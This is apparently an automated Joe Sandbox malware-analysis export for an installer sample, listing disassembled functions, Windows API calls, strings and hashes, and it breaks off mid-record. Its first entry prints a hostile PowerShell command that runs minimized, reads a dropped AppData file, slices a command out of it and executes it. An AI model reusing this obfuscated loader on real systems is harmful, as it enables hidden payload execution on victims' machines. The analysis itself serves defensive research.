Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77)
API String ID: 2987980305-2036027624
Opcode ID: 20bc1816f56d20a1b627cb331607c6b265b609b398bff74a3f14d5173b71760e
Instruction ID: 3f2733cfc3de05a67066b1a81d0209d8d10e728cfd6e940428cc792ad37f86ee
Opcode Fuzzy Hash: 20bc1816f56d20a1b627cb331607c6b265b609b398bff74a3f14d5173b71760e
Instruction Fuzzy Hash: 9A21EB72904215BBCF10BFA4CE4DA6E79B0AB44358F60823BF601B62D1D7BD4D41EA5E

Function 0040231C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040235A
lstrlenA.KERNEL32(%machinates%\vatter\udkastelses.Bss116,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040237A
RegSetValueExA.KERNELBASE(?,?,?,?,%machinates%\vatter\udkastelses.Bss116,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B3
RegCloseKey.KERNELBASE(?,?,?,%machinates%\vatter\udkastelses.Bss116,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490

Strings

%machinates%\vatter\udkastelses.Bss116, xrefs: 0040236B, 00402379, 0040238D, 0040239D, 004023A8

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID: %machinates%\vatter\udkastelses.Bss116
API String ID: 1356686001-330666689
Opcode ID: 6670bcdd6f7fb3a37c4f81c4b6863055cb9a018f5a6df9660185d00d0f00dabc
Instruction ID: 1cf33929fc1c1ea186c23a4fc9732b6d29fed694b94c5232bf99ec9a4aeb90bc
Opcode Fuzzy Hash: 6670bcdd6f7fb3a37c4f81c4b6863055cb9a018f5a6df9660185d00d0f00dabc
Instruction Fuzzy Hash: 941172B1E00118BFEB10EFA4DE89EAF7678FB50358F10413AF905B61D1D7B85D41A668

Function 004015B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040581A: CharNextA.USER32(?,?,00421100,?,00405886,00421100,00421100,?,?,76F92EE0,004055D1,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,00000000), ref: 00405828
Part of subcall function 0040581A: CharNextA.USER32(00000000), ref: 0040582D
Part of subcall function 0040581A: CharNextA.USER32(00000000), ref: 00405841

CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\supersystem\panelet,00000000,00000000,000000F0), ref: 00401622

Strings

C:\Users\user\AppData\Roaming\supersystem\panelet, xrefs: 00401617

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
String ID: C:\Users\user\AppData\Roaming\supersystem\panelet
API String ID: 3751793516-2983365704
Opcode ID: 337c7b3c4140c84b030b3cce5cd43aa59531b2b1dc8ea7579ad4e15f4152f9ed
Instruction ID: 1974da3e9f268a507fe0b48e67c441281edfefc09bb705423f1444e47e3c3739
Opcode Fuzzy Hash: 337c7b3c4140c84b030b3cce5cd43aa59531b2b1dc8ea7579ad4e15f4152f9ed
Instruction Fuzzy Hash: 4D112931908150ABDB113F755D4496F37B4EA62365728873FF891B22D1C23C4D42A62E

Function 004059B1 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004059C5
GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 004059DF

Strings

"C:\Users\user\Desktop\ulf4JrCRk2.exe", xrefs: 004059B1
C:\Users\user\AppData\Local\Temp\, xrefs: 004059B4, 004059B8
nsa, xrefs: 004059BC

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\ulf4JrCRk2.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-233409385
Opcode ID: 41eb4eacc2b5e04bba23a072be30983b5b4707d802c2e92527758f248babbe87
Instruction ID: 4ed204ab2def1aeaad47fe5e86fe5e9a332b18b7b34da24a025185dbc17c0528
Opcode Fuzzy Hash: 41eb4eacc2b5e04bba23a072be30983b5b4707d802c2e92527758f248babbe87
Instruction Fuzzy Hash: 60F02732308308BBEB008F16DC04B9B7B9CDF95720F00C03BF904EA281D2B0D8048B98

Function 00402A3D Relevance: 7.6, APIs: 5, Instructions: 67
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE(?,?,00000000,?,?), ref: 00402A5E
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A9A
RegCloseKey.ADVAPI32(?), ref: 00402AA3
RegCloseKey.ADVAPI32(?), ref: 00402AC8
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AE6

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: c984344fdf4f474ce3138d385fa253ab73c2912e651deaf7f4d1b8ad40b66a52
Instruction ID: 87201a58af63731299c065c60a73f314b5aa52cedce30dc2bb0b82caebebd8ee
Opcode Fuzzy Hash: c984344fdf4f474ce3138d385fa253ab73c2912e651deaf7f4d1b8ad40b66a52
Instruction Fuzzy Hash: 7B114F71A00008FFDF219F90DE48EAA3B7DEB44349B104076FA05B11A0D7B59E55AF69

Function 0040303A Relevance: 6.1, APIs: 4, Instructions: 108
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 0040304F

Part of subcall function 004031CC: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EA4,?), ref: 004031DA

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F52,00000004,00000000,00000000,?,?,?,00402ECB,000000FF,00000000,00000000), ref: 00403082
WriteFile.KERNELBASE(0040A8A0,0040FD89,00000000,00000000,004128A0,00004000,?,00000000,?,00402F52,00000004,00000000,00000000,?,?), ref: 0040313C
SetFilePointer.KERNELBASE(0014D3D6,00000000,00000000,004128A0,00004000,?,00000000,?,00402F52,00000004,00000000,00000000,?,?,?,00402ECB), ref: 0040318E

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: File$Pointer$CountTickWrite
String ID:
API String ID: 2146148272-0
Opcode ID: e969f51fb91c1eed4d8a9bc9024c2eb0b6bf39f0f502a3b67258e99aab1be33f
Instruction ID: 2060b4db2a59e7e801be0a10e6f45457beaa1fbeaf8038f8ae1418eaad325724
Opcode Fuzzy Hash: e969f51fb91c1eed4d8a9bc9024c2eb0b6bf39f0f502a3b67258e99aab1be33f
Instruction Fuzzy Hash: 4B414F725052019FDB10BF29EE849663BFCFB4431A715863BE810BA2E4D7389952CB5E

Function 004054A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00421500,Error launching installer), ref: 004054C9
CloseHandle.KERNEL32(?), ref: 004054D6

Strings

Error launching installer, xrefs: 004054B7

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 034994f398fec6ba88842b1298b049e6f5c009d7984ce4a05d2457150fb2f9bc
Instruction ID: 1668edf84edc795d90e5179e363d58f44986d7750dcb732495ea53e78f2e035e
Opcode Fuzzy Hash: 034994f398fec6ba88842b1298b049e6f5c009d7984ce4a05d2457150fb2f9bc
Instruction Fuzzy Hash: 8AE0E674A00209BBDB109FA4DD05A6B77BCEB14345B508561B911E2160E774D9548A79

Function 004031E3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON

Download Yara Rule

APIs

Part of subcall function 00405F5C: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\ulf4JrCRk2.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,76F93410,004033C9), ref: 00405FB4
Part of subcall function 00405F5C: CharNextA.USER32(?,?,?,00000000), ref: 00405FC1
Part of subcall function 00405F5C: CharNextA.USER32(?,"C:\Users\user\Desktop\ulf4JrCRk2.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,76F93410,004033C9), ref: 00405FC6
Part of subcall function 00405F5C: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,76F93410,004033C9), ref: 00405FD6

CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93410,004033C9), ref: 00403204

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004031E4, 004031E9, 004031EF, 004031FB, 00403203, 0040320A
1033, xrefs: 0040320B

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID: 1033$C:\Users\user\AppData\Local\Temp\
API String ID: 4115351271-3283962145
Opcode ID: 19db8b8bfed8fece06fc430a338c59f426dc89455e02ba762a85112f258f8684
Instruction ID: 49f334a6ee715e6e2f1f3bf4cc11e7508e43270cc78003a87510b5ca2b0d9132
Opcode Fuzzy Hash: 19db8b8bfed8fece06fc430a338c59f426dc89455e02ba762a85112f258f8684
Instruction Fuzzy Hash: 4CD0C71154AD3066D55137263D46FCF050C8F46719F514077FD04751C29B6C594365EF

Function 00406700 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02ed812fe0e611b0f2998a09c2da57c3139bdc2a01b144affc629b665b317990
Instruction ID: cc181508766c158152089796d80991778684c5c1c63ccc40f22f1fdcfebbd241
Opcode Fuzzy Hash: 02ed812fe0e611b0f2998a09c2da57c3139bdc2a01b144affc629b665b317990
Instruction Fuzzy Hash: C8A13371E00228CBDF28CFA8C8547ADBBB1FB44305F15816EE816BB281D7785A96DF44

Function 00406901 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 214f48695c7995470a7a0fcbeb3eca81d4e2424ba51fdacd53dd0d027dd6a452
Instruction ID: 3fc28d3a08aea7e3d86c5d24e10e7686d7df8f1296a80a0676572424d41607f7
Opcode Fuzzy Hash: 214f48695c7995470a7a0fcbeb3eca81d4e2424ba51fdacd53dd0d027dd6a452
Instruction Fuzzy Hash: FF912370E00228CBDF28CF98C8547ADBBB1FB45305F15816ED816BB291D7785A96DF44

Function 00406617 Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aafcf2097c1515207922f326c8ed1c2e4537c5f7359ba1e2f684dafb2374b94b
Instruction ID: dd30d2edeb09ef8142f3126e4ca7f9bb6d977725bfad211a31da1ac854ab15b9
Opcode Fuzzy Hash: aafcf2097c1515207922f326c8ed1c2e4537c5f7359ba1e2f684dafb2374b94b
Instruction Fuzzy Hash: 29814771E00228CFDF24CFA8C8447ADBBB1FB44305F25816AD416BB281D7389A96DF05

Function 0040611C Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 439609ef046878b9c851ba854847407a98b524300d750c8d5ff49980f3ce6887
Instruction ID: 9c7bf14ce72a16f54db54216be52a61449617ebae17e1f3f959b8044aea663dd
Opcode Fuzzy Hash: 439609ef046878b9c851ba854847407a98b524300d750c8d5ff49980f3ce6887
Instruction Fuzzy Hash: 42816771D00228CBDF24CFA8C8447ADBBB1FB44305F11816EE856BB281D7786A96DF45

Function 0040656A Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ca8852c6a58b64f8378a0d1c7197c8df105657e20cc6a0d4183a5da649b504f
Instruction ID: 46e89f5986d2092b55afe70fa6685d9fa399791e8108fb818b391c00f2395523
Opcode Fuzzy Hash: 5ca8852c6a58b64f8378a0d1c7197c8df105657e20cc6a0d4183a5da649b504f
Instruction Fuzzy Hash: DB7134B1D00228CFDF24CFA8C9547ADBBB1FB48305F15816AE816BB281D7385A96DF45

Function 00406688 Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b7285504dc25ebea62f348072f1f3953958a79e977259425cfc79aacb6983c9
Instruction ID: 5e67b4a66f05046138c2ae5a0676b57ce30197662a7df0c6b5261f8fe412ade3
Opcode Fuzzy Hash: 7b7285504dc25ebea62f348072f1f3953958a79e977259425cfc79aacb6983c9
Instruction Fuzzy Hash: 22713471E00228CBDF28CFA8C854BADBBB1FB44305F15816ED816BB291D7385A96DF45

Function 004065D4 Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c3b74398c38f172e1519338bca71769cfe788df72e053bc328fcfef0089e390
